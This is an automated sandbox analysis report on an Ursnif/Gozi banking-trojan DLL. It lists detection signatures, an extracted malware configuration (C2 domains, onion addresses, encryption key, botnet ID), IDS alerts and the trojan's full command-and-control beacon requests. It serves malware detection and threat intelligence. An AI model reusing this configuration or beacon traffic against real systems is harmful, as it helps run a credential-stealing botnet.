Windows Analysis Report worVoBJYGD.dll

Overview

General Information

Sample Name: worVoBJYGD.dll
Analysis ID: 458873
MD5: 2f3c83a9b7d37b99c603a28d09c74cc6
SHA1: 697235d82ea9218b2349cb1055276a1ebe96aefd
SHA256: 68ab9c658f136782ec8e341d0ad8257989689882cfc03db4cdf719b3a68c8e85
Tags: dllGoziISFBUrsnif
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Sigma detected: Encoded IEX
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Ursnif
Allocates memory in foreign processes
Compiles code for process injection (via .Net compiler)
Creates a thread in another existing process (thread injection)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Mshta Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Suspicious Rundll32 Activity
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://gtr.antoinfer.com/FXZ4lJvs/pnPhoUboMRVeoTe_2BxFQHV/VrMabiiED1/fjSHMBnhaHvqGkBru/BBTTQ6QwiwG2/i_2B4XLvHY3/zQLJ0W4RRFNlvQ/B3u_2FSgrcZQDj_2BbFWa/Bx8WB7z_2BuLUgre/PCgyAB0W6V5ZAPj/EUhKDrtuQoVEfKF_2F/dcW7lxG1t/oqJkrgpYdakzYVLuFura/45KMjCH_2BPWhKVH2At/F3l8q550AYqbFa84glQVmt/K2gCe0Lr0TKfs/y_2FaOCB/ygw2OjZ6hu69MXjNR4EuLCN/Av5n84Tspg/9rzu_2F5EAjaDhz2A/PQ8PWyfZ/9t_2F Avira URL Cloud: Label: malware
Source: http://gtr.antoinfer.com/08OjUeXqnP9/J746P5EGkluNVd/IJ_2B0pRlg5g_2Fpunyf_/2BXLVHvYLaERgrs5/6QTGZHoxYTnKCap/ZPQAuenP_2FyJ6hWxg/pWql_2F5l/kLJRoq5u3UoR4652KiHp/EmofwTCfdG6EODl70rf/KEalVhNFb6NVkmQGTmfz_2/B7kttRIp_2Bne/TjMfdOpf/19l29_2BHFRm1Q66bkvKZWZ/DZZfqXshBY/y14LEgOTtytG3Ix8L/xeX8bRPtnh6u/r2W_2BXkRqN/peDwoZDDU11DTW/WVHbt8_2BPQcYfD7tFwK0/zJnaF28QV4LV_2F7/vA9Gd_2F8SeHe3M/sh52_2Bep9d5h/oiu8Z2yw Avira URL Cloud: Label: malware
Source: http://gtr.antoinfer.com/mTRcVo1kR/Y_2FA_2BfssGFqVyATv2/Ha48GIz6nIiYpIeUH4v/_2FG2EmK4VeNaMJVBDrk0J/_2B1TzmrJnGIJ/nya_2F8I/cdZf2M97sVJPBZwkgGorhXf/mRYeY9vLlb/ql65kRpFXqGZwBQer/rXMufQHq_2FU/nIy69w6PhML/8J3AhNFQ4Jy96G/w5vhfh_2BIJ7d9IoLb98y/oKxTbr81HhqnJ1L1/Jh1VS63mbokZ6cg/EiF4xFifMJVfOHV2Q_/2FlZvyJ76/jzog_2BoRPm_2FGOWmRI/FPnBmD_2BoCBmqUOVLw/rpKEm_2F86qO2njAFbe3qJ/1v9sWMzqblkv_/2F_2BDgW007d7/LtA8 Avira URL Cloud: Label: malware
Source: http://gtr.antoinfer.com/DeX5GWZg0Peq/7NgceSVLwb_/2FKBdrhD_2BrPB/8c1uiDVblu0VRxOwf86RB/7RlrJfNAcSl8yK9M/_2BR6tZsQdJK7DQ/0XeQ_2FDLrv1nAxzaB/T3xKAFAr_/2Fp4Ltq73VjaHHoQztD1/x183TFWpQzC6_2F2n_2/FW_2BJ7_2BLURkcNjyg4hv/iERXmjmDxZ_2B/MqlUCL1c/d0YTAfP_2B2t_2FpDPiA4C7/kp7kRE_2BM/6ThuCNdgd0HyvWufQ/x61l_2FymcLS/YGjjC9Byoh4/QKUChdjQOX9Lh8/tWuTsS4vrxaovoeb8MTe0/n0ug3jEb10v8CjXy/4y_2Bffi5hDHF4e/taOpwFWZ_2FIS/gE Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000000.00000002.497784812.0000000003120000.00000040.00000001.sdmp Malware Configuration Extractor: Ursnif {"RSA Public Key": "XIQ66Sm6I98pcZAgIrZV1QfUYCowoyPvAE0ZGoUgS6LRMgPUz1CjzrhYfIXNK4I/5IuxCPvsPosYMGmpJAGwuiufC5ilxlpxNXjOvZf/072uMnV3R8Omqvlr+TUeswWBriIAFZY/aSr0j7JV6iJrVfwOKuYBzEzn95xd7jqdIO1IDtgQOe1zk9B/od2PHQ4N5H6FvG+U4i9V8MADwHONlD1brINCCdaaC2W6Qp9XxRnFqMgRJ11Iryex4VSd5uE7o6/Nj6obfRxYgX/9kpKybm15Tv3BHBp9AFun5vwEIvKQiP6MHnUYchwnFuWqwNNwMjcVV+KXsy8CJKXx/Cr9tXrtx3Y8jox8xHMgA2vPxVE=", "c2_domain": ["app.flashgameo.at", "apr.intoolkom.at", "r23cirt55ysvtdvl.onion", "gtk5.variyan.at", "pop.biopiof.at", "l46t3vgvmtx5wxe6.onion", "v10.avyanok.com", "free.monotreener.com", "sam.notlaren.at"], "ip_check_url": ["curlmyip.net", "ident.me", "l2.io/ip", "whatismyip.akamai.com"], "serpent_key": "rQH4gusjF0tL2dQz", "server": "580", "sleep_time": "10", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "600", "time_value": "600", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "240", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "240", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "2500", "SetWaitableTimer_value": "60"}
Multi AV Scanner detection for domain / URL
Source: gtr.antoinfer.com Virustotal: Detection: 12% Perma Link
Source: app.flashgameo.at Virustotal: Detection: 11% Perma Link

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00D94CEA CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 4_2_00D94CEA

Compliance:

barindex
Uses 32bit PE files
Source: worVoBJYGD.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000017.00000002.429129001.000001ED7C9D0000.00000002.00000001.sdmp, csc.exe, 0000001D.00000002.443954090.000002400C710000.00000002.00000001.sdmp, csc.exe, 00000020.00000002.449751054.000001317AE50000.00000002.00000001.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\fedhsvoj\fedhsvoj.pdb source: powershell.exe, 00000013.00000002.561042649.0000020484316000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.436321416.0000000004EC0000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.474646332.0000000005840000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.436321416.0000000004EC0000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.474646332.0000000005840000.00000004.00000001.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\senxb4p4\senxb4p4.pdbXP source: powershell.exe, 00000013.00000002.561042649.0000020484316000.00000004.00000001.sdmp
Source: Binary string: c:\922\exact-round\Example\horse\in.pdb source: loaddll32.exe, 00000000.00000002.504641313.000000006DDD0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.507786068.000000006DDD0000.00000002.00020000.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\fedhsvoj\fedhsvoj.pdbXP source: powershell.exe, 00000013.00000002.561042649.0000020484316000.00000004.00000001.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\senxb4p4\senxb4p4.pdb source: powershell.exe, 00000013.00000002.560986791.00000204842CD000.00000004.00000001.sdmp
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_03139386 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 0_2_03139386
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0312CA40 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 0_2_0312CA40
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_03140F53 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 0_2_03140F53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_05380F53 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 4_2_05380F53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_05379386 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 4_2_05379386
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0536CA40 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 4_2_0536CA40
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_03126457 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 0_2_03126457

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49722 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49722 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49723 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49723 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49724 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49724 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49725 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49726 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49726 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49727 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49727 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49738 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49738 -> 185.228.233.17:80
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ITOS-ASRU ITOS-ASRU
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /FXZ4lJvs/pnPhoUboMRVeoTe_2BxFQHV/VrMabiiED1/fjSHMBnhaHvqGkBru/BBTTQ6QwiwG2/i_2B4XLvHY3/zQLJ0W4RRFNlvQ/B3u_2FSgrcZQDj_2BbFWa/Bx8WB7z_2BuLUgre/PCgyAB0W6V5ZAPj/EUhKDrtuQoVEfKF_2F/dcW7lxG1t/oqJkrgpYdakzYVLuFura/45KMjCH_2BPWhKVH2At/F3l8q550AYqbFa84glQVmt/K2gCe0Lr0TKfs/y_2FaOCB/ygw2OjZ6hu69MXjNR4EuLCN/Av5n84Tspg/9rzu_2F5EAjaDhz2A/PQ8PWyfZ/9t_2F HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: GET /xeokJbRqOl3gRd/X3OYN3TXIyfP1rKJadFox/hkDEMFqGc3z5N0jb/OSe88cYQHbyuSyF/L_2BGXtQlRaEWOYgGy/iGe9pg_2B/kC4LmyHng_2FvJ1rpXvU/r_2BZHx4cR2W2aSgMrL/JfmqfENA8zSGFufIIE0hzo/19OQbirroLXoz/7woD_2Fn/PEok8EnxPZROEqPbm_2BBd4/HH8ql3GbQ8/5Mk8GmbHI0E_2BK8q/0FGuRwkqUf0g/VJJie0BY_2B/zf4uXegc1oUq1M/kGjn1PvLWjrBuIQHmv_2B/3Va8kJS9ZeQUj30z/_2FoWBI8OFd1rcBCCFd/6 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: GET /DeX5GWZg0Peq/7NgceSVLwb_/2FKBdrhD_2BrPB/8c1uiDVblu0VRxOwf86RB/7RlrJfNAcSl8yK9M/_2BR6tZsQdJK7DQ/0XeQ_2FDLrv1nAxzaB/T3xKAFAr_/2Fp4Ltq73VjaHHoQztD1/x183TFWpQzC6_2F2n_2/FW_2BJ7_2BLURkcNjyg4hv/iERXmjmDxZ_2B/MqlUCL1c/d0YTAfP_2B2t_2FpDPiA4C7/kp7kRE_2BM/6ThuCNdgd0HyvWufQ/x61l_2FymcLS/YGjjC9Byoh4/QKUChdjQOX9Lh8/tWuTsS4vrxaovoeb8MTe0/n0ug3jEb10v8CjXy/4y_2Bffi5hDHF4e/taOpwFWZ_2FIS/gE HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: GET /xpQtxUX3h_2FQKxJhfUx/G0zs_2BNyFnX7DIXqIv/lnFizf7MXIsO8WrV7iWZn_/2BjQPC7zwHzVS/342TzGfK/2qMhdDtEUWr3PuMULGHY7Wo/oH2PWiLOuv/rVab55pGcs3BjCEFy/fjf5J0mtPw74/bUga6aKy9a0/8sjdMu3LKL0W9F/lJKdHZn6kyKDin_2BwMdR/Co0bi6iqwKADh3im/EkdX1PzjugiiFzL/eq7opWWHrRFIO6DADe/KGFblEs7Y/dlX3yYwk_2BuqKiUtLfZ/ayAcx2n0s2knyq63tAp/4ZU8TWhq99lb0QUr9JY6xW/K9imquPwClp_2Bwu/6UIrfdf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: GET /08OjUeXqnP9/J746P5EGkluNVd/IJ_2B0pRlg5g_2Fpunyf_/2BXLVHvYLaERgrs5/6QTGZHoxYTnKCap/ZPQAuenP_2FyJ6hWxg/pWql_2F5l/kLJRoq5u3UoR4652KiHp/EmofwTCfdG6EODl70rf/KEalVhNFb6NVkmQGTmfz_2/B7kttRIp_2Bne/TjMfdOpf/19l29_2BHFRm1Q66bkvKZWZ/DZZfqXshBY/y14LEgOTtytG3Ix8L/xeX8bRPtnh6u/r2W_2BXkRqN/peDwoZDDU11DTW/WVHbt8_2BPQcYfD7tFwK0/zJnaF28QV4LV_2F7/vA9Gd_2F8SeHe3M/sh52_2Bep9d5h/oiu8Z2yw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: GET /mTRcVo1kR/Y_2FA_2BfssGFqVyATv2/Ha48GIz6nIiYpIeUH4v/_2FG2EmK4VeNaMJVBDrk0J/_2B1TzmrJnGIJ/nya_2F8I/cdZf2M97sVJPBZwkgGorhXf/mRYeY9vLlb/ql65kRpFXqGZwBQer/rXMufQHq_2FU/nIy69w6PhML/8J3AhNFQ4Jy96G/w5vhfh_2BIJ7d9IoLb98y/oKxTbr81HhqnJ1L1/Jh1VS63mbokZ6cg/EiF4xFifMJVfOHV2Q_/2FlZvyJ76/jzog_2BoRPm_2FGOWmRI/FPnBmD_2BoCBmqUOVLw/rpKEm_2F86qO2njAFbe3qJ/1v9sWMzqblkv_/2F_2BDgW007d7/LtA8 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: GET /p0mrlA_2F3nwmuOO5YjXTbA/cd8IEyE4_2/FI8A_2FRC5apSNIFU/7NfGVV9uGpRL/s6DAoaMbBtN/eYfp7C4d_2F3Is/s4XG4SPnRiQ7lPcEUOZTG/dYTbEto_2F1qrOzS/I0vg3Aj3uP5f_2F/4uoaP31e5KEGdC1u9L/oWhwQd6oE/Nvhp83GHi3mH9zcVaKW0/JwD5AHcQxGrogNbSOUn/soZuo4elXh3sevhCFwKNDb/LefWHBaTOp39g/WKwxmRdA/L1LsDG1W8J3kilFzwHSP3cM/ofk_2BkzS2/fYG6a0xp2L0bHH9qT/VzjD_2B4vW7z/v2KCn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Host: app.flashgameo.at
Source: global traffic HTTP traffic detected: POST /OiT_2FirHnJjoHi9Wz9/lRYYufFMTul_2B_2BY5CkW/SD8SHNDbwgWIv/CzkJRl4V/2qlIA9Op7QeGDe_2FdwjIV7/xPEy8vzfH2/VxoY4K2lc_2FXWXvK/mDsSgC08BTqd/mqIKDTZ_2F9/kA8vkXWNOd488F/ErqgFvCrl5Yz6usP1jvws/BevN_2BeaMhEHvMh/FRgus9uETEHjdsv/FSZwcCE4sYXuHvntAo/tvQ8Ok9Ns/ghPnWtwC3QyjsPH942Uo/R1DuZ1r1nnC3Zyx8YUp/2fidg_2Fh8kkAMOPis4sXs/5aKWUUxdSRpaI/n_2FzGZTe/pJ3zVp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Content-Length: 2Host: app.flashgameo.at
Source: global traffic HTTP traffic detected: GET /FXZ4lJvs/pnPhoUboMRVeoTe_2BxFQHV/VrMabiiED1/fjSHMBnhaHvqGkBru/BBTTQ6QwiwG2/i_2B4XLvHY3/zQLJ0W4RRFNlvQ/B3u_2FSgrcZQDj_2BbFWa/Bx8WB7z_2BuLUgre/PCgyAB0W6V5ZAPj/EUhKDrtuQoVEfKF_2F/dcW7lxG1t/oqJkrgpYdakzYVLuFura/45KMjCH_2BPWhKVH2At/F3l8q550AYqbFa84glQVmt/K2gCe0Lr0TKfs/y_2FaOCB/ygw2OjZ6hu69MXjNR4EuLCN/Av5n84Tspg/9rzu_2F5EAjaDhz2A/PQ8PWyfZ/9t_2F HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: GET /xeokJbRqOl3gRd/X3OYN3TXIyfP1rKJadFox/hkDEMFqGc3z5N0jb/OSe88cYQHbyuSyF/L_2BGXtQlRaEWOYgGy/iGe9pg_2B/kC4LmyHng_2FvJ1rpXvU/r_2BZHx4cR2W2aSgMrL/JfmqfENA8zSGFufIIE0hzo/19OQbirroLXoz/7woD_2Fn/PEok8EnxPZROEqPbm_2BBd4/HH8ql3GbQ8/5Mk8GmbHI0E_2BK8q/0FGuRwkqUf0g/VJJie0BY_2B/zf4uXegc1oUq1M/kGjn1PvLWjrBuIQHmv_2B/3Va8kJS9ZeQUj30z/_2FoWBI8OFd1rcBCCFd/6 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: GET /DeX5GWZg0Peq/7NgceSVLwb_/2FKBdrhD_2BrPB/8c1uiDVblu0VRxOwf86RB/7RlrJfNAcSl8yK9M/_2BR6tZsQdJK7DQ/0XeQ_2FDLrv1nAxzaB/T3xKAFAr_/2Fp4Ltq73VjaHHoQztD1/x183TFWpQzC6_2F2n_2/FW_2BJ7_2BLURkcNjyg4hv/iERXmjmDxZ_2B/MqlUCL1c/d0YTAfP_2B2t_2FpDPiA4C7/kp7kRE_2BM/6ThuCNdgd0HyvWufQ/x61l_2FymcLS/YGjjC9Byoh4/QKUChdjQOX9Lh8/tWuTsS4vrxaovoeb8MTe0/n0ug3jEb10v8CjXy/4y_2Bffi5hDHF4e/taOpwFWZ_2FIS/gE HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: GET /xpQtxUX3h_2FQKxJhfUx/G0zs_2BNyFnX7DIXqIv/lnFizf7MXIsO8WrV7iWZn_/2BjQPC7zwHzVS/342TzGfK/2qMhdDtEUWr3PuMULGHY7Wo/oH2PWiLOuv/rVab55pGcs3BjCEFy/fjf5J0mtPw74/bUga6aKy9a0/8sjdMu3LKL0W9F/lJKdHZn6kyKDin_2BwMdR/Co0bi6iqwKADh3im/EkdX1PzjugiiFzL/eq7opWWHrRFIO6DADe/KGFblEs7Y/dlX3yYwk_2BuqKiUtLfZ/ayAcx2n0s2knyq63tAp/4ZU8TWhq99lb0QUr9JY6xW/K9imquPwClp_2Bwu/6UIrfdf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: GET /08OjUeXqnP9/J746P5EGkluNVd/IJ_2B0pRlg5g_2Fpunyf_/2BXLVHvYLaERgrs5/6QTGZHoxYTnKCap/ZPQAuenP_2FyJ6hWxg/pWql_2F5l/kLJRoq5u3UoR4652KiHp/EmofwTCfdG6EODl70rf/KEalVhNFb6NVkmQGTmfz_2/B7kttRIp_2Bne/TjMfdOpf/19l29_2BHFRm1Q66bkvKZWZ/DZZfqXshBY/y14LEgOTtytG3Ix8L/xeX8bRPtnh6u/r2W_2BXkRqN/peDwoZDDU11DTW/WVHbt8_2BPQcYfD7tFwK0/zJnaF28QV4LV_2F7/vA9Gd_2F8SeHe3M/sh52_2Bep9d5h/oiu8Z2yw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: GET /mTRcVo1kR/Y_2FA_2BfssGFqVyATv2/Ha48GIz6nIiYpIeUH4v/_2FG2EmK4VeNaMJVBDrk0J/_2B1TzmrJnGIJ/nya_2F8I/cdZf2M97sVJPBZwkgGorhXf/mRYeY9vLlb/ql65kRpFXqGZwBQer/rXMufQHq_2FU/nIy69w6PhML/8J3AhNFQ4Jy96G/w5vhfh_2BIJ7d9IoLb98y/oKxTbr81HhqnJ1L1/Jh1VS63mbokZ6cg/EiF4xFifMJVfOHV2Q_/2FlZvyJ76/jzog_2BoRPm_2FGOWmRI/FPnBmD_2BoCBmqUOVLw/rpKEm_2F86qO2njAFbe3qJ/1v9sWMzqblkv_/2F_2BDgW007d7/LtA8 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: GET /p0mrlA_2F3nwmuOO5YjXTbA/cd8IEyE4_2/FI8A_2FRC5apSNIFU/7NfGVV9uGpRL/s6DAoaMbBtN/eYfp7C4d_2F3Is/s4XG4SPnRiQ7lPcEUOZTG/dYTbEto_2F1qrOzS/I0vg3Aj3uP5f_2F/4uoaP31e5KEGdC1u9L/oWhwQd6oE/Nvhp83GHi3mH9zcVaKW0/JwD5AHcQxGrogNbSOUn/soZuo4elXh3sevhCFwKNDb/LefWHBaTOp39g/WKwxmRdA/L1LsDG1W8J3kilFzwHSP3cM/ofk_2BkzS2/fYG6a0xp2L0bHH9qT/VzjD_2B4vW7z/v2KCn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Host: app.flashgameo.at
Source: unknown DNS traffic detected: queries for: gtr.antoinfer.com
Source: unknown HTTP traffic detected: POST /OiT_2FirHnJjoHi9Wz9/lRYYufFMTul_2B_2BY5CkW/SD8SHNDbwgWIv/CzkJRl4V/2qlIA9Op7QeGDe_2FdwjIV7/xPEy8vzfH2/VxoY4K2lc_2FXWXvK/mDsSgC08BTqd/mqIKDTZ_2F9/kA8vkXWNOd488F/ErqgFvCrl5Yz6usP1jvws/BevN_2BeaMhEHvMh/FRgus9uETEHjdsv/FSZwcCE4sYXuHvntAo/tvQ8Ok9Ns/ghPnWtwC3QyjsPH942Uo/R1DuZ1r1nnC3Zyx8YUp/2fidg_2Fh8kkAMOPis4sXs/5aKWUUxdSRpaI/n_2FzGZTe/pJ3zVp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Content-Length: 2Host: app.flashgameo.at
